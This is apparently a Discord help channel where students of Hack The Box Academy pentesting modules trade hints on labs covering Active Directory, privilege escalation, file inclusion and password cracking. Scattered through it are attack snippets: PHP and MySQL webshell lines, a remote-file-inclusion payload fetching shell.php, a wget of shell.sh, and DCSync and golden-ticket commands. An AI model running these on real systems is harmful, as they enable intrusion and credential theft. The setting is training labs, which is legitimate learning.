#modules
Why is the order odd?
Okay, Network Traffic Analysis could have been placed earlier. But apart from that?
Javascript deobfuscation at the very end? lol
Yes, it doesn't have much in common with the rest of the modules.
I think there's still something about phishing to come. Only then JavaScript really becomes a topic
JavaScript Deobfuscation being there might just be because they put malware analysis so late
Let's see what the path looks like when it's complete.
It would be cool if we could then use these labs to prepare for the exam
https://www.hackthebox.com/blog/htb-sherlocks-dedicated-labs
I'm on the windows file transfer methods module and I don't see any references to the command "python3 -m http.server 8000"
That's what I've used in the past for download operations. Just curious, I expected to see it mentioned.
Forget I said anything, I just looked ahead and it's in the linux transfer methods module
that makes more sense.
I just saw the python3 -m uploadserver command and thought it would be in the same module
basically start a web server and get your victim to fetch "http://example.com/your_file.exe"
Hello,
In the module Ad, Section "Attacking Domain Trusts - Child -> Parent Trusts - from Windows"
I get a golden ticket for user hacker using mimikatz. I can see it with klist. However, the command `ls \\academy-ea-dc01.inlanefreight.local\c$`
returns an error. Is it me or something else?
ban speedrun
any recommendation which to do first?
<@&861185840277487616>
this is rule break right?
Serious Rule Break skip for the any% ban speedrun :o
Tells us that we can’t do nothing but dam where his messages at? Haha
127.0.0.1
What happened?
other mod deleted it I guess
one guy asking for someone to perform a DDoS attack on an IP
Can anyone explain the commands here? I understand the outcome, but I don't want to blindly follow commands without knowing more about how they work.
Hi Everyone! I'm working on the Academy module for Footprinting. Making my way through the Hard lab at the end. I've managed to capture some keys and SSH into the system. I don't have root, but I'm wondering if there are any suggestions or things to look for once establishing a foothold. I've checked some of the bash history under the user I have logged into, but nothing stands out. Any suggestions?
Here are two tips: the IMAP/POP3 and SNMP modules were extremely helpful for solving this. EDIT: Since you've already SSH, here is another hint: the MySQL section was helpful.
chatgpt will demonstrate every single command better than anyone
match command-line arguments to their help text
Intro to Assembly Language
Hi
Module: Attacking Common Applications
Section: Attacking GitLab
Question: gain remote code execution on the GitLab instance? Submit the flag in the directory you land in.
Here, I found the user named D... Could someone give me a hint how to find his password? I searched through the git repositories but found nothing. Maybe I missed something?
there is no need to attempt to find his password
Have you tried enumerating more once you've SSH'ed into the system? Ask yourself what the user might have done in the system.
Hi! I'm on the Password Attacks module in the medium lab and I don't have a good wifi connection. I have retrieved some users but just got false positives with the 123456 password.
I am trying to brute force SSH with hydra but get nothing with the password list provided, and with rockyou or a mutated list it takes a lot of time.
Any hints on which password list to use to save time?
can anyone help me with the windows privilege escalation module dnsadmins sections?
I can't get the flag or the reverse shell even after I follow the step by step from the module, is there something missing?
Footprinting - mysql
I cannot install the mysql server and it does not seem to be installed on the pwnbox. Anyone have a nudge?
yo guys why can't I send pictures in here?
I guess because you haven't verified your Discord account yet
how do i do that
go to #bot-commands and type /verify then follow the instructions the bot DMs you
Hello everyone! Recently, I've been having this problem where any target machine becomes very unstable. It's on for a few minutes, then randomly goes off and I can't access it for some time. Then, it just randomly goes on again. This makes it nearly impossible to solve questions. The problem also happens in every module. I tried this with Pwnbox and the same thing happens. Has anyone else been experiencing this problem? Or is it just me?
reach out to support through the website
why can't I find my account identifier?
I'm in my user settings right now but I can't find it
Thank you
Follow the instructions here: #welcome message
the token is copied from the right hand side of the page
oh it's on the main platform
@fallow delta please, how did you RDP with user ilfserveradm?
I just guessed
Please delete the image.
Answers to questions should not be posted
if you have looked carefully enough at the last result, there is a variable that can help you identify the operating system based on the value
How you did it, I do not know. How to do it correctly is described in the module
wdym
from one x range to y range, you can guess the operating system
I'm new to this cyber world, so I don't understand you, sorry
like I think I'm in the second module
are you talking about the X(ip) > Y(ip)?
Nope, not the IP, it's something that has "live" in its name
im so confused lol
Try to ping yourself (localhost) and look at the values, you know that you use a Linux OS disregarding the distro flavour
Also, disregard the time column that holds the values in ms
please, how do I RDP to the user?
ohhhh
you are talking about the TTL, right?
🙏
but I don't get how a TTL is related to an OS
Each OS has its own default TTL
For pings
I am doing the Hacking WordPress module, and I am at the last section, skills assessment. wpscan is telling me that the target does not seem to be running WordPress.
and I manually checked the target
it does not seem to actually be running WordPress
Check the Source Code
I came across this article
Now I am confused.
You write that you are in the WordPress module.
But you post a question from another module.
oh I did know that this was from another module, my bad
I think I found it, this should be it: http://blog.inlanefreight.local
Yes, it will be announced soon
I imagine red team experience is more valuable as a blue teamer, than blue team experience would be as a red teamer.
If you want to attack something, you must know how a defender thinks and acts.
If you want to defend something, you must know how an attacker thinks and acts.
Module: FILE INCLUSION, Section: Remote File Inclusion (RFI), Question: Attack the target, gain command execution by exploiting the RFI vulnerability, and then look for the flag under one of the directories in /. Payload: http://10.129.29.114/index.php?language=ftp://10.10.15.163:21/shell.php&cmd=ls ../../../
do I have to get root privs to get the flag?
can't find the flag in any file in the / dir
how do I find the hostname of a target?
hostname
To use FTP you have to run an FTP server serving the payload on your machine. Are you doing that?
yes I am, I was just lost in the dirs, but anyway I got the flag
like sudo nmap hostname (ip)?
In this video, I will walk you through the steps of installing Kali Linux 2023.2 in VirtualBox on a Windows 11 PC.
Step by step guide: https://www.geekrar.com/easy-way-to-install-kali-linux-in-virtualbox-2023/
===============================
Download Kali: https://www.kali.org/get-kali/
Download VirtualBox: https://www.virtualbox.org/
Private ...
thank you so much
Hi! I'm on the Password Attacks module in the medium lab and I don't have a good wifi connection. I have retrieved some users but just got false positives with the 123456 password.
I am trying to brute force SSH with hydra but get nothing with the password list provided, and with rockyou or a mutated list it takes a lot of time.
Any hints on which password list to use to save time?
guys, I'm doing the Post-Exploitation module and I can't find the right answer for question nr 2. According to me it is PCI, but it doesn't work
Is there anyone who has done Linux Privilege Escalation > Logrotate and is willing to help me with a sanity check? I want to know what I did wrong with my command
The command is probably spoiler so I'm not sure if I can post it here
yeah I'm stuck here too, I've somehow created two more log files but no shell has been executed
use -sV -sC and try banner grab, it should be there
What is a banner grab?
I found it is faster to perform password scanning using the web parrot machine provided by htb, especially if you have bad connection
I'm a bit desperate here. I am on Password Attacks Lab - Hard, already got the .vhd file, but I can't mount it. Only one partition appears in the disk partitions and it's not BitLocker. I've tried it on the VM and I can't do it either. Can someone help? I've tried guestmount and it always gives an error.
I just did it from a Windows dev VM machine I had for tests
Okey, I'll try thanks
hi, I'm stuck on Linux File Transfer Methods question 2:
Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, extract the file, and run "hasher <extracted file>" from the command line. Submit the generated hash as your answer.
already uploaded with scp, but when I SSH in and extract the .zip, the value is invalid
Module : Windows event logs & finding evil
Section : Windows event logs.
Question 1 : Analyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer. Answer format: T_W_____.exe
Hi ! I'm currently stuck there too, can you tell me what I'm doing wrong ?
Hi, read the question carefully again: Analyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer. Answer format: TW__.exe
I am doing the WordPress hacking final assignment. I am trying to do RCE, and when I update from the theme editor it gives me this error. I simply add this line: "system($_GET['cmd']);"
Is this supposed to happen?
Never mind, I just updated another theme and it worked. I still think that this error is not supposed to happen.
Hi guys. How can I learn how to get a reverse shell from XAMPP? It's for a module.
The module should teach you all that you need to know - you may need to revisit the content again
@high zinc it doesn't
it should, otherwise chances are you're not supposed to get a rev shell
XAMPP contains MariaDB, PHP, and Perl, all of which have ways to give you a shell, if they are configured incorrectly on the target machine (or vulnerable versions are running)
dude, I've done many modules and I always have to search things
that happens sometimes yes.. but yeah, depending on what your target has running and how, different methods exist. XAMPP is a suite of tools
so far I've been copy/pasting from the sections to my terminal in the CPTS path, and I'm 13% through 😄
just wait
do you know of this one? https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master
Maybe it can help
(worthy of a bookmark regardless)
I am stuck at this last question in the WordPress last section and it is driving me nuts, since I even got the reverse shell: "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download?"
I have no clue where this file might be
?
Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download?
I've typically found flag files in /home/<someuserhere>/flag.txt, /root/flag.txt, /flag.txt, ../../../../../../../../../../flag.txt (i.e. at the root of the context that the vulnerable web app is at when exploiting, like /var/www/myLittlePhpPlatform/flag.txt)
Maybe the search engine of your choice will help you to find this plugin.
they seem to be already on the box with a terminal
Yes, but he still has to trigger the download via the plugin.
oh
Access via terminal is of no use to him in this task
i see
is it in the wpscan report?
This makes no sense to be honest
i'm not entirely sure, but i think so
Yes, it does make sense.
Sometimes there are vulnerabilities in software that can be exploited
The formulated question does not specify the file name
Because it doesn't need to.
Find the plugin, exploit the vulnerability and get the flag.
Just go to the forum, usually you find hints there
i told him what to do
are you talking about a Local File Inclusion vuln?
(if you haven't scanned with a (free) API key by the way, it'll make a huge difference)
No, I'm talking about a plugin with unauthenticated file download
There are so many vulnerabilities in the report, and none of them talks about arbitrary file download
Use a search engine
ok I will do that
Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download?
can someone help me with this error? I'm trying to convert an XML file into an HTML file
I just did this, it worked. Thank you!
It was too easy and stupid. Damn, I was just overthinking.
Is bruteforcing the first thing you did?
for the pivoting module's skill assessment, has anyone tried pivoting thrice to the DC? or is it simply not possible
https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0 You can try this
Accessing content from Windows BitLocker encrypted partition in a vhd file on Linux
No, the first thing that I did was to bruteforce the smb shares and retrieve a password protected zip file. I have tried to crack it but no password was found. I can’t do anything more in the smb shares, so I tried to find any valid credentials for the ssh service but I got stuck here.
Have you tried to crack the zip file with the mutated password list?
why do I want to disable these scans?
I want to say that Windows, by default, doesn’t respond to ping but that could have changed.
Regardless, sometimes you know a box exists but can’t ping it, so that’s what that option is for.
to not waste time?
The other two are built-in with a similar mindset
Basically. Also to make sure you’re picking on machines Nmap would otherwise ignore
👍
You may also end up in situations where ICMP is blocked on the network, so if you don't assume that the host is online, the scan will fail
(yes, blocked... some security folks are too paranoid)
So got a technical question because I might be doing this wrong. Trying to do the Privilege Escalation lesson in the Getting Started module and I've gotten the first flag and from here I'm trying to do further enumeration by pulling linpeas onto the target however both curl and wget are timing out when connecting to my machine. python3 was initially trying to set the ip to 0.0.0.0 so I changed it to my tun0 connection thinking that would allow it to connect but it seems I'm wrong. Anyone have guidance on this?
When a program says it’s listening on 0.0.0.0, that means it’s listening on all interfaces
You might not be specifying the correct IP, port, or path
Omfg… I tried everything this morning, I tried with the mutated list but I think I used the parameter --format=zip and it didn't work with it. Thank you very much, I have it now
someone got a list maybe of all the scans and what they do??
an explanation about them
nmap --help and particularly man nmap are good places to start 😄
Hi! I'm doing the last question of Windows PrivEsc - Pillaging, and I have the SYSTEM, SECURITY and SAM files, but secretsdump for some reason fails. Can someone help me?
So essentially let Py3 cook and specify my tun0 or eth0 ip in the pull and set the port the same on both?
Yep
Fingers crossed, I've been at this question for awhile now.
Shouldn’t take that long :/
john has some nice tools like zip2john, ssh2john, etc.
If you ran python3 -m http.server 8080 you should be doing wget http://10.10.10.10:8080/shell.sh
Assuming shell.sh is located in the path you started the webserver in
omg these modules are making me crazy
I have more problems getting things to work than learning I am DONE
What exactly are struggling to get working?
If you can get more specific we can try to help you
Like the burpsuite section here, its so easy and I have done burpsuit but I cant even follow along because its outdated https://academy.hackthebox.com/module/110/section/1049
I'm just done
ITS SO EASY BUT THEY MAKE IT SO HARD
Proxy>Options?? its Proxy>Settings. Then go to Intercept Server Responses...NOPE, its Response interception rules. ITS LIKE THIS EVERY MODULE IM DONE GOODBYE
The GUI may be changed, but the features are for sure still the same.. you just have to adapt
It should not be that frustrating to follow along clicking on Options instead of Settings.. it has pretty much the same meaning
Btw, you can report outdated things or bugs on #858470491676737536.. if some of HTB staff feels like it's important enough, it will be solved asap
but like what is this wording
In Burp, we can enable response interception by going to (Proxy>Options) and enabling Intercept Response under Intercept Server Responses.
then the next sentence:
After that, we can enable request interception once more and refresh the page.
what do you mean ONCE MORE???
"In Burp, we can enable response interception by going to (Proxy>Options) and enabling Intercept Response under Intercept Server Responses. After that, we can enable request interception once more and refresh the page." ONCE MORE??
I'm done bro, I have to take a chill pill
thanks for helping
I think none of the issues you're talking about are making it impossible to understand those concepts.. many modules could be done better but on average it's actually pretty good content for someone trying to learn
Take a break and try again later on.. that is probably a good way to deal with this situation
why are there so many lines? I did the exact same commands on the left and I got tons of lines
and it keeps going
If you scroll down a bit more, in that table, you will see what the --packet-trace option means and that will explain everything
so why don't I see so many lines in the HTB pic?
That "pic" has a line which is <SNIP> every time you see that, it means something from the command output has been omitted from the output you can see.. usually it's info that is not considered essential
ohh alr
can I get some help here? I'm stuck😕
I got all the open ports and the services but I have no idea what to do next
Generally speaking, try to provide which module you are on:)
Yo
One of these things is not like the others
No
Wym *
That's completely unrelated to academy
..
@carmine trench did you try something similar to the examples given in the module?
Nice so this server is called “HackTheBox” for no reason
There is allegedly an off-topic server somewhere
HackTheBox is the name of the website you absolute knob
You have to verify your main app.hackthebox.com account following instructions in #welcome
The other perks of doing so are it allows you to post images
thx, something messed up with my account, gotta contact a mod
That happens
If you look at members list you can see mods/admins and you can message any of them :D
there are other tools besides nmap (try the other ones noted in module)
Have you done this module?
I'm stuck in the same place.
I see various events with ID 4907 between logins, but they don't seem to have any correlation to the logins.
Nevertheless the EXE file is the correct one
Can you explain the correlation between the two events?
Hey guys, I'm on DCSync of Active Directory Enumeration & Attacks. I'm supposed to find syncron's cleartext password but I keep getting timed out errors: `secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5`
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Password:
[-] RemoteOperations failed: [Errno Connection error (172.16.5.5:445)] timed out
[*] Cleaning up...
Also if I try the mimikatz method to accomplish the same thing:
mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
I am sorry, have you done the previous one?
Yes
could you help me... thanks
@rapid sparrow Password123! should be wley's password
No I didn't do the module, just looked at the first question and found the thing
my reasoning was that something happened after 4907 which would be the next thing
I should open a new powershell with that user?
Can I send you a Printscreen?
I do not want to spoil here
sure
@rapid sparrow no you don't have to, just change Password123 to wley's pw, you can keep the powershell session open
this is the biggest problem...
Creating a Fake SPN
btw I forgot to mention you have to re-enter all the commands
@acoustic owl is it alright if I DM you?
could I also dm you....
@rapid sparrow sure lets DM
sure
I'm doing the module ATTACKING SAM. I'm trying to do the lab but I keep getting an error which I can't figure out why it's not working
I run the command `sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/bluekali`
and when I try to transfer the files over to the attack machine it disconnects for some reason
this is the RDP session to move the files over
Where did you save the sam and system files?
I copied the command in the module: `reg.exe save hklm\sam C:\sam.save`
Ok, so where does that command save the file to?
to the C drive
And where are you running the move command from?
🙈 thanks @trail leaf
Have you read the text...?
In your screenshot that is
Happens
oh wait @rustic sage
I tried to write it as the answer
and it doesn't work
what am I doing wrong?
Is anyone past Tomcat section on Attacking Common Apps?
yes and a bit of imagination to get the flag for me at least
No idea where that flag is located. I got a quite interactive webshell and using find / produces nothing
because it's not a fully interactive shell; you can use tree though, or at least that's what I have used in combination with CTRL+F
- remove your screenshot as it's revealing an answer
- you're probably also copying the 220 response code part, the flag is just the HTB{...
thank you
Appreciate the nudge. I started to go crazy
hello, I'm in the live engagement of Shells & Payloads and I can't manage to connect to 172.16.1.11:8080. Is it working for you?
Are you connected to the provided jump host?
the vpn ?
No
When you spawn target
Are you connected via rdp to that system
That's the first step
Yes
As the 172.16.x.x are internal
Note: for the webpage one, you can start Firefox by typing firefox in the terminal
thank you
Did you download the word list from resources tab?
Do that XD
That is 80% of answers
Can someone give me advice for NoSQL - Skills Assessment 2? I guess I found the idea, but I'm stuck with it
hello all
module USING WEB PROXIES
section: ZAP Fuzzer
The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists.
I was able to fuzz and get the cookie hash
ok
but how do I use the hash as a cookie to get the flag?
Module: window priv esc
Section: weak permission
Description: this section being haunted :))
Anyone able to give a nudge on Citrix Breakout? I started the smbserver on the htb-student box I rdp'd onto. But when trying to access the smb share I get Windows cannot access the share. Not able to transfer the tools needed to priv esc
can someone help me with Snort Rule Development in the Working with IDS/IPS module? I found the respective line in the pcap file and I googled many snort signatures for log4shell, but I have no idea what the question is about.
There is a file named log4shell.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to log4shell exploitation attempts, where the payload is embedded within the user agent. Enter the keyword that should be specified right before the content keyword of the rule with sid 10000098 within the local.rules file so that an alert is triggered as your answer. Answer format: [keyword];
Look to the dot
anyone here who could help me out with 'oopsie'?
uploaded the reverse shell but netcat does not show anything
Ask in #starting-point, you'll get more help there
Got with MySQL. Just had to backtrack some.
can someone explain to me what the /24 means?
@carmine trench look up CIDR notation
./odat.py file taking its time completing - thanks Footprinting module
So Getting Started -> Privilege Escalation. Am I going down the wrong path trying to get linpeas onto the target machine to enumerate it? I'm thinking that's the goal but I also feel like I'm going the wrong way at times.
You can use Linpeas or you can try to enumerate manually, up to you
iirc you don't need it to run the full amount of time to complete whatever task they want you to do
I am having trouble
I am not seeing the request in the Burp Suite HTTP history section when I run the nmap scan
I have tried with Intercept on and off
maybe its just taking a long time, its going through proxies or whatever I GIVE UP
yeah, it just took awhile I got it. I am gonna lose it before I get through all these modules
I'm cracking an NT hash
and for some reason hashcat isn't spitting out the password, any ideas/tips to help?
thought hash had to be in a file 🤔
that worked thanks
since it was only one hash to crack didn't need to put the hash in a file
guess I learned something today
Attacking Common Services - Easy: I have credentials, and I have now been stuck on the reverse shell. I've tried netcat, weevely, amongst a few other methods. Nothing working. From the forum, I see some folks uploaded through MySQL, but I am uploading through the browser. Can I get a nudge on which is the path to go? Also, which shell worked for you? Neither has for me.
I believe the intended route is ||upload through SQL||
Ok. I'll re-focus on that path and see what I can come up with. I'm sure I just have typos and incorrect syntax, etc. Trial and error. Thank you!
For me, it was literally as the examples showed... I'd confirm the IP address of the share, and the path you're typing. Failing that, try reverting the box.
Hello,
"Attacking domain trust from windows"
Golden ticket for 'hacker @ LOGISTICS.INLANEFREIGHT.LOCAL' successfully submitted for current session
mimikatz # exit
Then klist effectively returns the cached ticket, but I get "path does not exist" when I check with:
ls \\academy-ea-dc01.inlanefreight.local\c$
I need a nudge for this one...
discord removed the double backslash after ls
not a solution to your question, but a solution to your comment about Discord removing the double backslash... use triple backticks (`) both before and after the content you want to insert and it will then NOT remove the double backslash ... ls \\academy-ea-dc01.inlanefreight.local\c$
Thank you.
I am still investigating my issue.
In a session without golden ticket, I expect a
ls : Access is denied
But I get
ls : Cannot find path '\\academy-ea-dc01.inlanefreight.local\c$' because it does not exist.
So navigating through windows explorer I tried some folders I found there, such as User Share, Department Shares, ZZZ_archive. But I get the same error message like nothing exists.
And with the golden ticket I get the same results.........
how about with IP, instead of hostname?
In Linux Privilege Escalation > Logrotate, I tried to use the root permission from the logrotten exploit to write a setuid file a.sh
(Use echo to write this to a.sh)
#!/bin/bash
whoami
cat /etc/sudoers
Then chmod 4777 a.sh (as root)
When I run ls -l a.sh, it shows -rwsrwxrwx root root. However, when I try to use the account htb-student to run ./a.sh, the whoami command returns htb-student, and the cat /etc/sudoers command returns permission denied. What did I do incorrectly with setuid?
There is a file in the hashcat folder that's called potluck or something pot. It stores your found hashes. So what happened is you found this hash/password before and it's in the file. If the hash is in the file it does not try to crack it.
hashcat.potfile
@high reef If you are testing, delete the found/known hashes from the potfile. It will try to crack the hash again. Thanks @balmy saffron
It already cracked it previously
2 weeks ago a guy told me how he locked a bunch of crypto in a wallet. Asked me to help, told him I have a lot of GPUs but no idea how to brute force. Spent the last 2 weeks learning how to. I am currently at a 7-character password. Should be done tonight. No password yet. So now I shall learn how to do a dictionary attack
That's completely unrelated to academy content
Refer to #welcome
Should I put that comment in a password protected file and see if you can hack it?
No
Ok so your comment is pointless
This situation is completely unrelated to academy content
Which is what this channel is about
Which is why I referred you to #welcome , which tells you how to access more of the server
It's actually 100 percent related, hence my comments above helping the person that had a question.
Probably stop being an NPC, your life will be more enjoyable
The main point of my comment was to that person asking for help. I believe I helped with the answer. I did not know the answer 2 weeks ago. Learning is fun.
So we are 20 more useless comments into this channel, because you wanted to show your power over someone on Discord. You showed me, my guy. As Jesus would say, love your neighbor
Lol I have no power
I understand that, that's why you feel the need to role play it
I'm just stating the story didn't seem relevant
¯\_(ツ)_/¯
Whatever you gotta say pal
Love your neighbor, if you don't have something nice to say, don't say it
I mean I haven't been mean
Not everyone is you and not everyone follows your logic
The fact you commented on my last post, not the 5 above it where I took time out of my day to help this person with an issue they were having, was not nice
Have a lovely rest of your night, maybe it will be less toxic
The only one really being toxic is you, calling me an NPC. Being slightly butthurt that I just didn't think your story was relevant. Like, good job you're learning hashcat and cracking files.
Which there is a password attacks module that goes over different types and methods. Mostly over live tcp protocol, some regarding files
Hey, I'm currently using rpcclient to enumerate domain users and want to either write the output to a file or grep the output. I've tried looking at documentation and looked it up but I haven't found anything quite yet
does anyone have any pointers?
enumdomusers > output.txt didn't do anything when I tried
no stress if not 🙂
I think the rpcclient tool allows you to pass a command through that you might be able to output it as
alright I'll have a look at that cheers
yep, and hint: if Burp is going too fast, set the delay to 25 sec
I did have that same issue multiple times and had to reset that buggy F'ing target god knows how many times until I got one that worked for me
also, with the PowerShell execution policy set to bypass you can import stuff straight from your SMB share: Import-Module \\10.13.38.95\share\PowerUp.ps1
no idea what issue you are having but if you still need help feel free to shoot me a dm
I ended up solving the section. Had to do some janky copy and paste magic. But yea good to know I wasn’t the only one facing that issue
yea working with windows 7 or earlier lab is always a pain in the ass
you can use the -c for running command without dropping into a kinda rpcclient shell so you can just pipe the output to something like grep
thanks man thats great, appreciate it
I've solved it. Turns out setuid only works for compiled binary in ubuntu
Hey guys, im doing the Windows Command Line Module and I wonder why/when we should use the "Invoke-Command" cmdlet and put commands in a script block and not just execute them directly?
If anyone has a moment to lend me a hand with the logrotate section of the Linux Privilege Escalation module I'd really appreciate it.
I just did it this morning if you need any help
Of course, two seconds after I finally reach out for help, I land the flag. Thanks mate. I really appreciate the offer. 🙂
Hello, I'm having trouble on the Pivoting, Tunneling, and Port Forwarding module. I'm stuck at the SocksOverRDP section. Whenever I try to use regsvr32.exe to load the DLL file required for SocksOverRDP to work, it gives me the error "module failed to load, the specified module could not be found". The filepath is definitely right though. Am I doing something wrong?
It's because there's a secondary protection running
Defender is turned off however that does not disable another protection feature that works in real time
I got it, had to exclude the file type in Windows Security. Thank you for the help!
Not sure why this isn't working.
I'm trying some pivot stuff. I watched in a video that this command should drop another ssh menu inside a ssh connection.
It's supposed to work like this.
Can't anyone help on why this isn't working?
Skill issue? I'd check the guide as that looks more like a key combo than anything else
^C denoting the hard cancel
But also what module is this for 😉
Shhh... This is the best section to ask questions and technically..... I'm hard stuck on Pivot module so i'm trying this box to get a better understanding of it. I noticed the cancel too but i think i saw in another video Ippsec did that as well. Does Ipp have write ups? I thought he only did the videos
This is how I got mine ||http://10.129.203.7/shell.php?cmd=type C:\Users\Administrator\Desktop\flag.txt|| how did you get yours? I also did the following as the second way to get the flag as well as privesc/takeout ||uploaded a meterpreter shell via ftp and then triggered via the webshell|| I
Hi mate is it possible to get a help on this..?
Hi @gaunt surge I also have issues finishing that lab, me, I'm at the point where i should do the reverse or bind shell but neither works for me. Any suggestions or hints please?
Dmd
I have this base64 encoded ticket, how am i supposed to get the ticket into aes? If I decrypt it with base 64 i get some weird stuff
In my notes i see that i used a|| sql webshell to get a webshell, in there i used revshells.com to generate a reverse (power)shell and get the flag||
something like this, but different path i think;
||mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php'||
Look at the ||look at the 2nd example under Exploitation section of the chapter. But you may also need to put it in something else to Bypass a Filter....||
hello anyone able to confirm what answer will be accepted here in Documentation & Reporting
i can do it in tmux with tmux but answer isnt accepting, trying caps/ spaces..?
I guess ill just die lol, ive tried everything, but I cant do it only using rubeus
what module/section your at please
Tried these solutions but no luck
I am wondering how i can use the base64encodedticket thing as a ticket
If I try to use the base64encodedticket it gives me an error
and I just want the ticket
as aes256
but I cant
what module
I dont get why that is important but ok
bcuz iv seen the issue before and have notes on it somewhere
ah oke
how come not doing it using rubeus
Short answer, no, because that would be sharing answers. The answer to what you should be asking: It's literally on the same page, try searching for the name of the answer to the 1st question + session. i.e. "<toolname> session".
If you follow the example step by step, you should find it.
Ah I figured it out, i didnt see one very important command xd
nice one
thing is im staring at the answer... i can split terminals vertically with the commands yet my input answer combinations isnt accepting
is it Ctrl, Control, control ctrl ctl?
got it... what a giant POS ...
funny how iv refreshed the page it's dropped one of the [KEYS] off my answer now ...
the questions says "(Answer format: [key] + [key] + [key], " but the accepted answer format has 4x [KEY] spaces
answer format is misleading
You need to put them in the format they provide. I.e. inside square brackets. [CTRL] + [key] + [key] + [key]
yes ty, thats not what the question suggests tho. bit misleading
it literally says that in the question
Thank you! Appreciate it
same question, only the top answer accepted for me but when refreshed changed to the bottom?
answer format showing 3x KEY spaces
Please help! I can't get the shell doing everything "right".
Module = Shells & Payloads | Automating Payloads & Delivery with Metasploit
Error = Exploit completed, but no session was created
maybe isn't right what you're doing, but it looks ok to me
Cant see anything obviously wrong, but one of things I've always done is set the LHOST to the name of the VPN tunnel interface (in pwnbox its tun0), rather than the IP address. Saves on typing, and you dont have to remember the IP.
And of course you dont get frustrated if the IP address changes after the VPN drops 😄
thats an awesome tip, i'll use it moving forward
it worked from the pwnbox, idk why
thank u for your help @pine dagger @fiery berry
After so many hours of reading about xampp I finally got the flag 
the guys on the forum were right, you have to understand how things work in order to hack them
and read the documentation
$ sudo zip2john backup.zip > hashes
zsh: permission denied: hashes
on module vaccine, any help
Better ask in #starting-point
If you have no access, read and follow #welcome
Well... that's not quite true, but certainly does help to understand wtf you are doing when things go wrong. 😄
Can anyone help me with logrotate module in linux privilege escalation. I don't know where to start and what to do.
Reading from the module is probably a good start.
Then try to practice what is shown there.
Hi! I’m a bit lost in the Password Attacks Lab - hard, I have the vhd file but I don’t know what to do with it. Any help?
I have tried to mount the image in win 7, 11, kali and manjaro and nothing. I use 7z to decompress it but I cant do anything with the img files
vhd files are virtual hard disks.
You can mount them.
You are in the Password Attacks module. So this file will be protected 😉
Yeah, with bitlocker isn’t it? I was following this link https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0 but it gave me error
Accessing content from Windows BitLocker encrypted partition in a vhd file on Linux
Yes exactly, bitlocker
Have you cracked the password?
No, I don’t know what to use
Can I pm?
sure
guys, is /usr/share/dirb/wordlists/small.txt good for ftp brute forcing?
How would you use it for ftp brute forcing? It’s a list of directory names, not users
I don't know which to use
Guys how do I check which hosts are up in a network using nmap? like what is the command
Try a username or password list. Or better yet, tell people which module/chapter/question you need help with.
Rockyou is always good for passwords
the list they provide doesn't work
If they provided it for a module then it should work
if things were that simple
Which module, which section?
@acoustic owl I didn't need a wordlist, like you said in the forum, for some reason the unusual port wasn't open
Can someone help me with that?
hello everyone, can i DM anyone about Kerberos Attacks - Skill Assessment on the first question?
hello! i'm having trouble on the NFS part of Footprinting. When I try to mount the share it gives me the error "operation not permitted" even though I'm running the command as sudo.
here's the command I'm using: sudo mount -t nfs 10.129.53.125:/var/nfs ./nfs/ -o nolock
am i doing something wrong?
hey friends, hope you have a good day, i am at Login Brute Forcing website skill assessment, i am stuck at the 2nd question, i tried rockyou and couldnt get a hit before the machine time is out, tried with rockyou-50 but didnt hit, i am sure that my post form code is correct, i just dont know where the problem is
sorry, I haven't seen that it is for the web skill assessment. I'm going to check my notes
@rich perch try using sudo mount -t nfs 10.129.53.125:/ ./target-NFS/ -o nolock
use the same username found at the beginning of the first question. The rest of the command seems to be fine
OMG bro !! you dont know how much time i wasted on this, thank you so much 😊
I tried on Pwnbox running the same command and it worked. Something funky with my VM... thank you for the help anyways!
If you need help in Footprinting just tell me. I can give you hints to save your mental
sure
Hey, need help with Footprinting Lab - Easy.
Found two ftp servers @ port 21 and 2121. Connecting to them works fine, but not possible to find any files with ls. I tried the ||wget -m --no-passive ftp://uname:pw@ip:port|| but no results. Have tried resetting target box. Any pointers?
solved* for future references, check firewall settings:)
On your client, not the server
ls -al
connection refused due to firewall settings was the issue
Can anyone help me mounting a BitLocker vhd file? It is from the password attacks hard lab. I have already found the password to decrypt the file, but can't get a prompt to put it in. So far I have tried
- The windows vm that is part of the assignment, but I can't mount it as I need the Admin's password and I feel like that is in the vhd file
- The parrot box was not able to install the necessary tools to mount it within Linux
- Cannot find anything that will allow me to mount it on my Mac
- My AWS Windows VM couldn't recognize the file and chose to not do anything with it
- My physical Windows computer also has no idea what to do with it. Literally no option to mount it in any way
- My Kali vm, just like the parrot box, cannot install the tools necessary
At this point I just want to know what is inside, I don't care how I get it
Is there a way to improve nmap speed over vpn? Running the pwnbox in a browser, nmap performs much faster scans, but I prefer to use a vpn, however it can be a bit annoying sometimes seeing a scan that's estimated to take a few hours, when on the pwnbox it completes in 10 seconds.
you can always tweak with the nmap options
Sure, but running the same scan on the pwnbox is sometimes several hours faster for some reason
